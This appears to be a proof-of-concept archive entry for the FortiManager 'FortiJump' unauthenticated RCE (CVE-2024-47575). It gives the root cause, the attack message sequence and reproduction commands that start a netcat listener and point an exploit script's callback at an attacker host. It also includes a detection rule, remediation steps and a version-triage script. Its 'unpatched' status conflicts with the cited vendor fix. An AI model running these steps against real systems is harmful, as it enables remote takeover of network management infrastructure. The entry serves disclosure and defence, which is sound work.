Fortinet FortiManager FortiJump Unauthenticated RCE (CVE-2024-47575)
by watchTowr Labs (Sina Kheirkhah) · 2026-05-17
- Severity: Critical
- CVE: CVE-2024-47575
- Category: network
- Affected product: Fortinet FortiManager / FortiManager Cloud (fgfmd daemon)
- Affected versions: FortiManager 7.6.0; 7.4.0–7.4.4; 7.2.0–7.2.7; 7.0.0–7.0.12; 6.4.0–6.4.14; 6.2.0–6.2.12; FortiManager Cloud 7.4.1–7.4.4, 7.2.1–7.2.7, 7.0.1–7.0.12, 6.4
- Disclosed: 2026-05-17
- Patch status: unpatched
References
- https://nvd.nist.gov/vuln/detail/CVE-2024-47575
- https://www.fortiguard.com/psirt/FG-IR-24-423
- https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
Archive entry
intelseclab/poc-archive
Metadata
| Field | Value |
|---|---|
| Date Added | 2026-05-17 |
| Author / Researcher | watchTowr Labs (Sina Kheirkhah) |
| CVE / Advisory | CVE-2024-47575 |
| Category | network |
| Severity | Critical |
| CVSS Score | 9.8 (CVSSv3) |
| Status | Weaponized |
| Tags | RCE, unauthenticated, FortiManager, fgfmd, zero-day, KEV |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Fortinet FortiManager / FortiManager Cloud (fgfmd daemon) |
| Versions Affected | FortiManager 7.6.0; 7.4.0–7.4.4; 7.2.0–7.2.7; 7.0.0–7.0.12; 6.4.0–6.4.14; 6.2.0–6.2.12; FortiManager Cloud 7.4.1–7.4.4, 7.2.1–7.2.7, 7.0.1–7.0.12, 6.4 |
| Language / Platform | Network-exposed FortiManager management plane over TLS (port 541 / fgfmd protocol) |
| Authentication Required | No |
| Network Access Required | Yes |
Summary
CVE-2024-47575 (FortiJump) is a missing-authentication flaw in FortiManager’s fgfmd daemon that lets a remote unauthenticated attacker execute arbitrary commands. Public exploit code demonstrates vulnerability detection and command execution primitives over the management protocol. Reporting indicates this bug was exploited as a zero-day from at least June 2024 and is tracked in CISA’s Known Exploited Vulnerabilities catalog.
Vulnerability Details
Root Cause
The fgfmd daemon accepts crafted management messages without properly enforcing authentication and authorization on critical actions. An attacker can impersonate a managed FortiGate context, establish a file-exchange channel, and issue privileged JSON RPC-like commands that reach command execution paths.
Attack Vector
An unauthenticated attacker with network reachability to the FortiManager management service (commonly TCP/541 over TLS) sends a crafted sequence (get ip → get auth → get file_exchange) and then submits a malicious command payload through channel messages.
Impact
Successful exploitation enables unauthenticated remote code execution on FortiManager infrastructure. Real-world impact includes device compromise, malicious script execution, and downstream control-plane abuse against managed security infrastructure.
Environment / Lab Setup
OS: Linux/macOS attacker host with Python 3
Target: Authorized FortiManager/FortiManager Cloud instance in vulnerable range
Attacker: Security testing workstation
Tools: Python 3, network reachability to TCP/541, netcat listener
Setup Steps
Proof of Concept
Step-by-Step Reproduction
Start a listener on your authorized lab attacker host.

    nc -lvvnp 4444

Run vulnerability check mode against the target.

    python3 CVE-2024-47575.py --target <fortimanager-ip> --action check

Run exploit mode to deliver the command payload.

    python3 CVE-2024-47575.py \
      --target <fortimanager-ip> \
      --lhost <attacker-ip> \
      --lport 4444 \
      --action exploit
Exploit Code
See CVE-2024-47575.py in this folder.
Expected Output
[VULN] Target is Vulnerable
Screenshots / Evidence
screenshots/: add authorized packet captures, listener callback evidence, and target-side logs
Detection & Indicators of Compromise
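SIEM / IDS Rule (example):

    alert tcp any any -> $HOME_NET 541 (msg:"Possible FortiManager CVE-2024-47575 exploitation sequence"; flow:to_server,established; content:"get file_exchange"; sid:952447575; rev:1;)

Because fgfmd traffic on TCP/541 is carried over TLS, this content match only fires where the sensor inspects decrypted traffic.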
Remediation
| Action | Detail |
|---|---|
| Patch | Apply Fortinet fixes from FG-IR-24-423 for FortiManager/FortiManager Cloud affected branches |
| Workaround | Restrict management-plane exposure to trusted admin networks and VPN-only access; block untrusted access to TCP/541 |
| Config Hardening | Monitor fgfmd traffic and logs for anomalous registration/channel operations; rotate credentials and audit managed devices after incident response |
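
To prioritize the patch action, an inventory can be checked against the affected ranges listed under Affected Target, including the Cloud ranges that start at .1 and the branch-wide "6.4" entry. This is an added example, not part of the original entry or the watchTowr repository; the function names are hypothetical and the inventory hostnames and versions are constructed.

```python
import re

# "Versions Affected" text copied from this page (en dashes included).
AFFECTED = (
    "FortiManager 7.6.0; 7.4.0–7.4.4; 7.2.0–7.2.7; 7.0.0–7.0.12; "
    "6.4.0–6.4.14; 6.2.0–6.2.12; FortiManager Cloud 7.4.1–7.4.4, "
    "7.2.1–7.2.7, 7.0.1–7.0.12, 6.4"
)
ENTRY = re.compile(r"(?:(FortiManager(?: Cloud)?) )?([\d.]+)(?:–([\d.]+))?$")

def to_tuple(version):
    """Extract the dotted number from a version string: 'v7.4.3-build1' -> (7, 4, 3)."""
    match = re.search(r"\d+(?:\.\d+)+", version)
    if not match:
        raise ValueError(f"no version number in {version!r}")
    return tuple(int(part) for part in match.group().split("."))

def parse_ranges(text=AFFECTED):
    """Return {product: [(low, high), ...]}; a product name carries over to later entries."""
    ranges, product = {}, None
    for entry in re.split(r"[;,]\s*", text):
        match = ENTRY.match(entry.strip())
        if not match:
            raise ValueError(f"unparsed entry {entry!r}")
        product = match.group(1) or product
        low = to_tuple(match.group(2))
        high = to_tuple(match.group(3)) if match.group(3) else low
        ranges.setdefault(product, []).append((low, high))
    return ranges

def is_affected(product, version, ranges=None):
    """True if in a listed range; a two-part bound like '6.4' covers the whole branch."""
    ver = to_tuple(version)
    return any(low <= ver[:len(low)] and ver[:len(high)] <= high
               for low, high in (ranges or parse_ranges()).get(product, []))

# Constructed inventory (hostnames and versions are made up for the example).
INVENTORY = [
    ("fmg-hq", "FortiManager", "v7.4.3-build0000"), ("fmg-lab", "FortiManager", "7.6.1"),
    ("fmg-cloud-a", "FortiManager Cloud", "7.4.0"), ("fmg-cloud-b", "FortiManager Cloud", "6.4.9"),
]

def triage(inventory=INVENTORY):
    """Return hostnames whose version is inside the page's affected ranges."""
    ranges = parse_ranges()
    return [host for host, product, ver in inventory if is_affected(product, ver, ranges)]

if __name__ == "__main__":
    print(triage())
```

A host outside these ranges is only outside what this page lists; fixed versions should be confirmed against FG-IR-24-423.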
References
- CVE-2024-47575 — NVD
- Fortinet PSIRT Advisory FG-IR-24-423
- watchTowr Labs Blog — Hop, Skip, FortiJump!
- CISA Known Exploited Vulnerabilities Catalog
- Source Repository — watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
Notes
Auto-ingested from https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575 on 2026-05-17.